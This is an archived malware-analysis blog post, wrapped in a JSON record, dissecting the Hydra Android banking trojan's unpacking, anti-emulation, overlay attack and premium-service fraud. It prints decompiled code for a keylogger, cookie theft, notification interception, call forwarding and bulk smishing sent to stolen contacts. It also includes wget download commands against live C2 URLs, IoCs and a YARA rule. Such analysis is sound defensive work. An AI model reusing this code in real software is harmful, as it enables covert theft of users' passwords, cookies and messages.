{
	"id": "21b67d83-0f5c-4da3-b09d-ef0db113a45f",
	"created_at": "2026-04-06T01:29:30.164031Z",
	"updated_at": "2026-04-10T13:11:56.922655Z",
	"deleted_at": null,
	"sha1_hash": "bec4df40e786eee71fbba54f09836acb5fe1d34f",
	"title": "Technical analysis of Hydra android malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 438595,
	"plain_text": "Technical analysis of Hydra android malware\r\nBy Muhammad Hasan Ali\r\nPublished: 2022-09-20 · Archived: 2026-04-06 01:06:56 UTC\r\n11 minute read\r\nIn the name of God, the Most Gracious, the Most Merciful\r\nFreePalestine\r\nUnpacking\r\nIf we unzip the sample and explore the AndroidManifest.xml , we see that the entry point\r\ncom.sdktools.android.MainActivity is not found in the code of the sample. This is an indication of a packed\r\nsample. You can identify the packing technique using droidlysis or APKiD. If we use droidlysis , we can see\r\nthat the sample uses DexClassLoader and that the malware uses the JsonPacker packer. So we need to get the decrypted\r\npayload of the sample. We will use Frida to get the decrypted payload. We will install the sample on the Android\r\nStudio emulator and, using WSL on my host, we will launch Frida to start the malicious APP to get the\r\npayload. Then we pull the payload to our host from the emulator.\r\nFigure(1) KCFj.json is our decrypted payload\r\nAnti-emulator\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 1 of 17\n\nI tried to run the sample in an emulator such as Android Studio and intercept the traffic between the malware\r\nand the C2 server with Burp Suite . But it didn’t go as well as my last analysis of a previous sample of Hydra\r\non my twitter. Then I used our magic tool droidlysis to get the properties of the payload KCFj.json . I see the\r\npayload is checking if there’s a qemu emulator.\r\nFigure(2) droidlysis result for qemu detection in sample code\r\nThen I used the APKiD tool to get more details of the anti-emulation technique’s code.\r\nFigure(3) APKiD result for anti-vm detection in sample code\r\nWe get the sample code for detecting a VM in the SdkManagerImpl class located in com.sdktools.android.bot . If\r\none of these checks is true, then I guess the malware will act differently. 
The malware won’t communicate with\r\nthe C2 server to get the targeted APPs to perform the Overlay attack or to get the mirrors/domains . We will\r\nsee.\r\nprivate static boolean isEmulator() {\r\n return (Build.BRAND.startsWith(\"generic\")) \u0026\u0026 (Build.DEVICE.startsWith(\"generic\")) || (Build.FINGERPRINT\r\n }\r\nSolution\r\nWhen I encounter a sample that uses anti-emulation techniques, I use tria.ge to get the traffic between the malware and\r\nthe C2 server. If you go to the previous link, you will find the communication between the malware and the C2\r\nserver. You can download the files using wget + link, such as wget http://lalabanda.com/payload .\r\nFigure(4) Communication between C2 and the malware\r\nWhen we download the mirrors file from http://lalabanda.com/api/mirrors , we will find encoded domains. I\r\nguess when the main C2 server is down, the malware will communicate with the mirrors or domains that we\r\ndownloaded. You can find these domains in the IoCs section.\r\nThen we see a zip file called jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip which we can download from\r\nhttp://lalabanda.com/storage/zip/jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip . After downloading the\r\nfile and unzipping it, we see it contains two folders. The first contains icons and the second is inj which contains 360\r\nfolders named after the targeted APPs. 
Inside the folders located in the inj folder, there are the html files which\r\nwill be used in the Overlay attack .\r\nFigure(5) targeted apps which contain html files to perform overlay attack\r\nPremium services\r\nThe malware will try to subscribe to a premium service without the knowledge of the user, which will charge the\r\nSIM more money.\r\nprivate void launchUssdCode(Context context0, String s) throws Exception {\r\n this.ussdCalledTimeInMs = System.currentTimeMillis();\r\n Timber.d(\"log -\u003e [%s]\", new Object[]{s});\r\n Intent intent0 = new Intent(\"android.intent.action.CALL\", Uri.parse(\"tel:\" + s.replaceAll(\"#\", Uri.encod\r\n intent0.addFlags(0x10000000);\r\n intent0.addFlags(0x20000000);\r\n context0.startActivity(intent0);\r\n }\r\n public boolean onAccessibilityEvent(InjAccessibilityService injAccessibilityService0, AccessibilityEvent acc\r\n if(accessibilityEvent0 != null \u0026\u0026 accessibilityEvent0.getSource() != null \u0026\u0026 (s.equalsIgnoreCase(\"com.an\r\n StringBuilder stringBuilder0 = new StringBuilder();\r\n for(Object object0: accessibilityEvent0.getText()) {\r\n stringBuilder0.append(\" | \");\r\n stringBuilder0.append(((CharSequence)object0));\r\n }\r\n UssdComponent.sendPhoneNumber(stringBuilder0.toString());\r\n }\r\n return false;\r\n }\r\nSteal cookies\r\nThe malware will try to steal cookies from APPs such as Facebook and Google .\r\npublic class CookiesReaderViewerActivityInterfaceImpl extends IScreen {\r\n public interface LifeCycleListener {\r\n boolean onPause();\r\n boolean onResume();\r\n }\r\n private InjectCookiesModel cookieModel;\r\n private LifeCycleListener lifeCycleListener;\r\n private WebView webView;\r\n public CookiesReaderViewerActivityInterfaceImpl(InjectCookiesModel injectCookiesModel0) {\r\n this.cookieModel = injectCookiesModel0;\r\n }\r\n 
public CookiesReaderViewerActivityInterfaceImpl(InjectCookiesModel injectCookiesModel0, LifeCycleListener co\r\n this.cookieModel = injectCookiesModel0;\r\n this.lifeCycleListener = cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0;\r\n }\r\n private void handleData(Activity activity0) {\r\n try {\r\n this.webView.clearView();\r\n String s = this.cookieModel.getFirstScreen();\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 5 of 17\n\nthis.webView.loadUrl(s);\r\n Timber.d(\"INJECTS -\u003e display file: \" + s, new Object[0]);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\n private void init() {\r\n this.webView.getSettings().setDomStorageEnabled(true);\r\n this.webView.getSettings().setMixedContentMode(0);\r\n com.sdktools.android.bot.components.injects.system.CookiesReaderViewerActivityInterfaceImpl.1 cookiesRea\r\n @Override // android.webkit.WebViewClient\r\n public void onPageFinished(WebView webView0, String s) {\r\n super.onPageFinished(webView0, s);\r\n if(s.contains(CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getScreenToFinish())) {\r\n String s1 = CookieManager.getInstance().getCookie(s);\r\n StringBuilder stringBuilder0 = new StringBuilder();\r\n stringBuilder0.append(\"print event:\");\r\n stringBuilder0.append(CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getFirstScre\r\n stringBuilder0.append(CookieManager.getInstance().getCookie(CookiesReaderViewerActivityInter\r\n stringBuilder0.append(\" \\n\");\r\n stringBuilder0.append(\" \\n\");\r\n stringBuilder0.append(CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getScreenToF\r\n stringBuilder0.append(CookieManager.getInstance().getCookie(CookiesReaderViewerActivityInter\r\n stringBuilder0.append(s1);\r\n if(!TextUtils.isEmpty(stringBuilder0)) {\r\n String s2 = CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getApplicationId()\r\n InjectComponent.get().getConfigsProvider().getInjectHandler().handleWebViewLog(CookiesRe\r\n }\r\n 
}\r\n }\r\n @Override // android.webkit.WebViewClient\r\n public boolean shouldOverrideUrlLoading(WebView webView0, String s) {\r\n Timber.d(\"INJECTS -\u003e ulr loaded: \" + s, new Object[0]);\r\n webView0.loadUrl(s);\r\n return true;\r\n }\r\n };\r\n this.webView.getSettings().setJavaScriptEnabled(true);\r\n this.webView.getSettings().setAllowFileAccess(true);\r\n this.webView.getSettings().setSaveFormData(true);\r\n this.webView.getSettings().setAppCacheEnabled(false);\r\n this.webView.getSettings().setCacheMode(2);\r\n this.webView.setBackgroundColor(0);\r\n this.webView.setWebViewClient(cookiesReaderViewerActivityInterfaceImpl$10);\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 6 of 17\n\n@Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onCreate(Activity activity0) {\r\n FrameLayout frameLayout0 = new FrameLayout(activity0);\r\n frameLayout0.setBackgroundColor(-1);\r\n WebView webView0 = new WebView(activity0);\r\n this.webView = webView0;\r\n frameLayout0.addView(webView0, new FrameLayout.LayoutParams(-1, -1));\r\n activity0.setContentView(frameLayout0);\r\n this.init();\r\n this.handleData(activity0);\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onPause(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = false;\r\n LifeCycleListener cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0.onPause();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onResume(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = true;\r\n LifeCycleListener cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n 
cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0.onResume();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onStop(Activity activity0) {\r\n super.onStop(activity0);\r\n activity0.finish();\r\n }\r\nKeylogger\r\nThe malware has the ability to keylog what the user enters, such as a password or any EditText that contains a\r\nhint . Then it sends the keylogged text to the C2 server.\r\n if(accessibilityEvent0.isPassword()) {\r\n if(!s1.contains(\"•\") \u0026\u0026 !s1.contains(\"*\")) {\r\n keyLoggerModel0.setText(s1);\r\n return false;\r\n }\r\n if(s1.equals(accessibilityEvent0.getSource().getHintText())) {\r\n keyLoggerModel0.setText(\"\");\r\n return false;\r\n }\r\n int v = keyLoggerModel0.getText().length();\r\n if(s1.length() \u003e v) {\r\n keyLoggerModel0.addToText(Character.toString(((char)s1.charAt(s1.length() - 1))));\r\n return false;\r\n }\r\n keyLoggerModel0.removeLastFromText();\r\n return false;\r\n }\r\n keyLoggerModel0.setText(s1);\r\n }\r\n return false;\r\n }\r\n @Override // com.sdktools.android.bot.SdkComponent\r\n public void onSyncEvent(JsonObject jsonObject0) {\r\n super.onSyncEvent(jsonObject0);\r\n Boolean boolean0 = JsonUtils.hasObject(jsonObject0, \"enable_keylogger\") ? 
Boolean.valueOf(jsonObject0.ge\r\n if(boolean0 != null) {\r\n SharedPrefHelper.setIsKeyLoggerEnabled(this.context(), boolean0.booleanValue());\r\n }\r\n }\r\n public void onWindowStateChanged() {\r\n if(this.candidateToPass.size() \u003e 0) {\r\n this.isRequestInProgress.set(true);\r\n Log.d(\"!!!!!\", \" SEND DATA TO SERVER \" + this.candidateToPass);\r\n KeyLoggerModel keyLoggerModel0 = (KeyLoggerModel)this.candidateToPass.get(0);\r\n HashMap hashMap0 = new HashMap();\r\n hashMap0.put(\"messages\", this.candidateToPass);\r\n this.api().makePost(\"device/kl\", hashMap0).enqueue(new RestCallback() {\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onError(Throwable throwable0) {\r\n KeyLoggerComponent.this.isRequestInProgress.set(false);\r\n }\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onSuccess(RestResponse restResponse0) {\r\n KeyLoggerComponent.this.candidateToPass.clear();\r\n KeyLoggerComponent.this.isRequestInProgress.set(false);\r\n }\r\n });\r\n }\r\n }\r\nClassic Features\r\nNotification intercepting\r\nThe malware will try to intercept notifications using the onNotificationPosted callback located in\r\ncom.sdktools.android.bot.components.commands . The malware will intercept the incoming notifications and\r\nhide them from the user. 
Then it pushes/uploads the content of the notification to the C2 server.\r\n public void onNotificationPosted(StatusBarNotification statusBarNotification0) {\r\n Log.i(this.TAG, \"********** onNotificationPosted\");\r\n if(SharedPrefHelper.getIsHiddenPushEnabled(this)) {\r\n this.cancelNotification(statusBarNotification0.getKey());\r\n }\r\n Notification notification0 = statusBarNotification0.getNotification();\r\n String s = notification0.extras.getString(\"android.title\");\r\n String s1 = notification0.extras.getString(\"android.text\");\r\n Timber.d(\"!!!!!\", new Object[]{\"title - \" + s + \" | description - \" + s1 + \" | app - \" + statusBarNotifi\r\n String s2 = \"Title - \" + s + \"\\nDescription - \" + s1;\r\n try {\r\n this.sendNotification(statusBarNotification0.getPackageName(), s2);\r\n }\r\n catch(Exception unused_ex) {\r\n return;\r\n }\r\n Timber.d(\"!!!!!\", new Object[]{\"cancel notification. Hidden\"});\r\n }\r\n @Override // android.service.notification.NotificationListenerService\r\n public void onNotificationRemoved(StatusBarNotification statusBarNotification0) {\r\n Timber.d(\"!!!!!\", new Object[]{\"********** onNOtificationRemoved\"});\r\n }\r\n private void sendNotification(String s, String s1) {\r\n HashMap hashMap0 = new HashMap();\r\n hashMap0.put(\"appId\", s);\r\n hashMap0.put(\"text\", s1);\r\n try {\r\n if(LockerComponent.get() != null \u0026\u0026 LockerComponent.get().api() != null) {\r\n LockerComponent.get().api().makePost(\"device/push\", hashMap0).enqueue(new RestCallback() {\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onError(Throwable throwable0) {\r\n }\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onSuccess(RestResponse restResponse0) {\r\n }\r\n });\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nCall Forwarding\r\nThe malware can intercept calls and forward calls when the 
user gets a phone call.\r\n public boolean onAccessibilityEvent(InjAccessibilityService injAccessibilityService0, AccessibilityEvent acc\r\n int v1;\r\n Log.d(\"OwnAccessibilityService\", \"onAccessibilityEvent -\u003e \" + accessibilityEvent0);\r\n Boolean boolean0 = Boolean.valueOf(false);\r\n if(accessibilityEvent0.getEventType() != 0x20) {\r\n return false;\r\n }\r\n if(accessibilityEvent0.getClassName().equals(\"com.android.phone.settings.SimPickerPreference\")) {\r\n if(accessibilityEvent0.getSource() == null) {\r\n return false;\r\n }\r\n this.isSecondSimActive = true;\r\n AccessibilityNodeInfo accessibilityNodeInfo0 = injAccessibilityService0.findAndGetFirstSimilar(acces\r\n if(this.currentSim == SimCard.Sim1) {\r\n injAccessibilityService0.performClick(accessibilityNodeInfo0.getChild(0), \"f\");\r\n return false;\r\n }\r\n if(this.currentSim == SimCard.Sim2) {\r\n injAccessibilityService0.performClick(accessibilityNodeInfo0.getChild(1), \"f\");\r\n return false;\r\n }\r\n }\r\n else if(accessibilityEvent0.getClassName().equals(\"com.android.phone.settings.GsmUmtsCallForwardOptions\"\r\n if(accessibilityEvent0.getSource() != null) {\r\n this.tryToClickXiaomiCallForwardingButton(injAccessibilityService0, accessibilityEvent0);\r\n return false;\r\n }\r\n int v = 0;\r\n while(v \u003c= 40) {\r\n if(v % 5 == 0) {\r\n injAccessibilityService0.performClick(injAccessibilityService0.getRootInActiveWindow(), \"\");\r\n }\r\n try {\r\n Thread.sleep(1000L);\r\n if(injAccessibilityService0.getRootInActiveWindow() != null) {\r\n injAccessibilityService0.getRootInActiveWindow().refresh();\r\n }\r\n boolean z = this.tryToClickXiaomiCallForwardingButton(injAccessibilityService0, accessibilit\r\n }\r\n catch(InterruptedException unused_ex) {\r\n return;\r\n }\r\n if(z) {\r\n return true;\r\n }\r\n ++v;\r\n continue;\r\n this.tryToClickXiaomiCallForwardingButton(injAccessibilityService0, 
accessibilityEvent0);\r\n return false;\r\n }\r\n }\r\nOverlay attack\r\nAs we saw, the malware downloads a zip file containing html files for the targeted apps. If a targeted APP is\r\nopened, then the malware will launch the html file of the targeted app. The code is located in\r\ncom.sdktools.android.bot.components.injects.system .\r\npublic class ViewerActivityInterfaceImpl extends IScreen {\r\n public interface LifeCycleListener {\r\n boolean onPause();\r\n boolean onResume();\r\n }\r\n public ViewerActivityInterfaceImpl(InjectModel injectModel0) {\r\n this.injectModel = injectModel0;\r\n }\r\n public ViewerActivityInterfaceImpl(InjectModel injectModel0, LifeCycleListener viewerActivityInterfaceImpl$L\r\n this.injectModel = injectModel0;\r\n this.lifeCycleListener = viewerActivityInterfaceImpl$LifeCycleListener0;\r\n }\r\n private void handleData(Activity activity0) {\r\n try {\r\n this.webView.clearView();\r\n String s = this.injectModel.getInjectPath();\r\n s = s.startsWith(\"http\") ? 
this.injectModel.getInjectPath() : \"file:///\" + s;\r\n this.webView.loadUrl(s);\r\n Timber.d(\"INJECTS -\u003e display file: \" + s, new Object[0]);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\n private void init() {\r\n this.webView.getSettings().setDomStorageEnabled(true);\r\n if(Build.VERSION.SDK_INT \u003e= 21) {\r\n this.webView.getSettings().setMixedContentMode(0);\r\n }\r\n com.sdktools.android.bot.components.injects.system.ViewerActivityInterfaceImpl.1 viewerActivityInterface\r\n @Override // android.webkit.WebChromeClient\r\n public boolean onConsoleMessage(ConsoleMessage consoleMessage0) {\r\n String s = consoleMessage0.message();\r\n if(!TextUtils.isEmpty(s)) {\r\n String s1 = ViewerActivityInterfaceImpl.this.injectModel.getApplicationId();\r\n InjectComponent.get().getConfigsProvider().getInjectHandler().handleWebViewLog(ViewerActivit\r\n }\r\n return super.onConsoleMessage(consoleMessage0);\r\n }\r\n };\r\n com.sdktools.android.bot.components.injects.system.ViewerActivityInterfaceImpl.2 viewerActivityInterface\r\n @Override // android.webkit.WebViewClient\r\n public boolean shouldOverrideUrlLoading(WebView webView0, String s) {\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 12 of 17\n\nTimber.d(\"INJECTS -\u003e ulr loaded: \" + s, new Object[0]);\r\n webView0.loadUrl(s);\r\n return true;\r\n }\r\n };\r\n this.webView.getSettings().setJavaScriptEnabled(true);\r\n this.webView.getSettings().setLoadWithOverviewMode(true);\r\n this.webView.getSettings().setAllowFileAccess(true);\r\n this.webView.getSettings().setSaveFormData(true);\r\n this.webView.getSettings().setAppCacheEnabled(false);\r\n this.webView.getSettings().setCacheMode(2);\r\n this.webView.setBackgroundColor(0);\r\n this.webView.setWebViewClient(viewerActivityInterfaceImpl$20);\r\n this.webView.setWebChromeClient(viewerActivityInterfaceImpl$10);\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onCreate(Activity activity0) {\r\n 
FrameLayout frameLayout0 = new FrameLayout(activity0);\r\n frameLayout0.setBackgroundColor(-1);\r\n WebView webView0 = new WebView(activity0);\r\n this.webView = webView0;\r\n frameLayout0.addView(webView0, new FrameLayout.LayoutParams(-1, -1));\r\n activity0.setContentView(frameLayout0);\r\n this.init();\r\n this.handleData(activity0);\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onPause(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = false;\r\n LifeCycleListener viewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(viewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n viewerActivityInterfaceImpl$LifeCycleListener0.onPause();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onResume(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = true;\r\n LifeCycleListener viewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(viewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n viewerActivityInterfaceImpl$LifeCycleListener0.onResume();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onStop(Activity activity0) {\r\n super.onStop(activity0);\r\n activity0.finish();\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public boolean overrideBackPress(Activity activity0) {\r\n return true;\r\n }\r\n private void startAppById(Context context0, String s) {\r\n try {\r\n context0.startActivity(context0.getPackageManager().getLaunchIntentForPackage(s));\r\n }\r\n catch(ActivityNotFoundException unused_ex) {\r\n }\r\n }\r\n}\r\nThe malware collects the contacts stored in the victim’s device and sends them to the C2 server. 
It then sends smishing messages to the stolen\r\nnumbers.\r\npublic static ContactsComponent get() {\r\n return ContactsComponent.instance;\r\n }\r\n private List getContactList() {\r\n ArrayList arrayList0 = new ArrayList();\r\n ContentResolver contentResolver0 = this.context().getContentResolver();\r\n Cursor cursor0 = contentResolver0.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);\r\n if((cursor0 == null ? 0 : cursor0.getCount()) \u003e 0) {\r\n while(cursor0 != null \u0026\u0026 (cursor0.moveToNext())) {\r\n String s = cursor0.getString(cursor0.getColumnIndex(\"_id\"));\r\n cursor0.getString(cursor0.getColumnIndex(\"display_name\"));\r\n if(cursor0.getInt(cursor0.getColumnIndex(\"has_phone_number\")) \u003c= 0) {\r\n continue;\r\n }\r\n Cursor cursor1 = contentResolver0.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null\r\n while(cursor1.moveToNext()) {\r\n arrayList0.add(cursor1.getString(cursor1.getColumnIndex(\"data1\")));\r\n }\r\n cursor1.close();\r\n }\r\n }\r\n if(cursor0 != null) {\r\n cursor0.close();\r\n }\r\n return arrayList0;\r\n }\r\n @Override // android.app.LoaderManager$LoaderCallbacks\r\n public Loader onCreateLoader(int v, Bundle bundle0) {\r\n return v == 1 ? this.contactsLoader() : null;\r\n }\r\n public void onLoadFinished(Loader loader0, Cursor cursor0) {\r\n this.contactsFromCursor(cursor0);\r\n }\r\n @Override // android.app.LoaderManager$LoaderCallbacks\r\n public void onLoadFinished(Loader loader0, Object object0) {\r\n this.onLoadFinished(loader0, ((Cursor)object0));\r\n }\r\n @Override // android.app.LoaderManager$LoaderCallbacks\r\n public void onLoaderReset(Loader loader0) {\r\n }\r\n @Override // com.sdktools.android.bot.SdkComponent\r\n public void onSyncEvent(JsonObject jsonObject0) {\r\n super.onSyncEvent(jsonObject0);\r\n if(1 == (JsonUtils.hasObject(jsonObject0, \"bulk_sms\") ? 
jsonObject0.get(\"bulk_sms\").getAsInt() : 0)) {\r\n String s = JsonUtils.hasObject(jsonObject0, \"bulk_body\") ? jsonObject0.get(\"bulk_body\").getAsString(\r\n if(!TextUtils.isEmpty(s)) {\r\n this.sendBulkSms(s, this.getContactList());\r\n }\r\n }\r\n }\r\n private void sendBulkSms(String s, List list0) {\r\n for(Object object0: list0) {\r\n this.sendSMS(((String)object0).replace(\" \", \"\"), s);\r\n try {\r\n Thread.sleep(300L);\r\n }\r\n catch(InterruptedException unused_ex) {\r\n return;\r\n }\r\n }\r\n }\r\n public void sendSMS(String s, String s1) {\r\n try {\r\n SmsManager.getDefault().sendTextMessage(s, null, s1, null, null);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nIoCs\r\nAPK hash: 8b321553f1a269ee4b68a02162ba2d14c71a92907b6001ff3db0fe5bae6b3430\r\nPayload (KCFj.json) hash: fd87c4f7c8ece0448dab67a0b689c4a417a153081059750295fbed29a1422b03\r\nC2 server:\r\nhttp://lalabanda.com\r\nRelated C2 servers:\r\nhttp://cslon.com\r\nhttp://cariciu-carilas.com\r\nhttp://carilas-carilas.net\r\nhttp://carilas-carilas.top\r\nYara rule\r\nrule Hydra {\r\n meta:\r\n author = \"@muha2xmad\"\r\n date = \"2022-09-21\"\r\n description = \"Hydra android malware\"\r\n version = \"1.0\"\r\n strings:\r\n $str00 = \"all_data.json\" nocase\r\n $str01 = \"res/xml/tfgztcqbitzuzb.xml\" nocase\r\n $str02 = \"res/xml/hccnqedztpvawk.xml\" nocase\r\n $str03 = \"res/xml/bkfzwlpvqlbmlh.xml\" nocase\r\n $str04 = \"com.wife.dizzy/shared_prefs\" nocase\r\n condition:\r\n uint32be(0) == 0x504B0304 // APK file signature\r\n and ( all of ($str*))\r\n}\r\nArticle quote\r\nFor you are not the clothes you wear,\r\nnor the names you carry,\r\nnor the land that raised you;\r\nyou are only what you do.\r\nREF\r\ntriage report\r\nPrevious Hydra analysis\r\ndroidlysis\r\nAPKiD\r\nFrida\r\nSource: https://muha2xmad.github.io/malware-analysis/hydra/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://muha2xmad.github.io/malware-analysis/hydra/"
	],
	"report_names": [
		"hydra"
	],
	"threat_actors": [],
	"ts_created_at": 1775438970,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bec4df40e786eee71fbba54f09836acb5fe1d34f.pdf",
		"text": "https://archive.orkl.eu/bec4df40e786eee71fbba54f09836acb5fe1d34f.txt",
		"img": "https://archive.orkl.eu/bec4df40e786eee71fbba54f09836acb5fe1d34f.jpg"
	}
}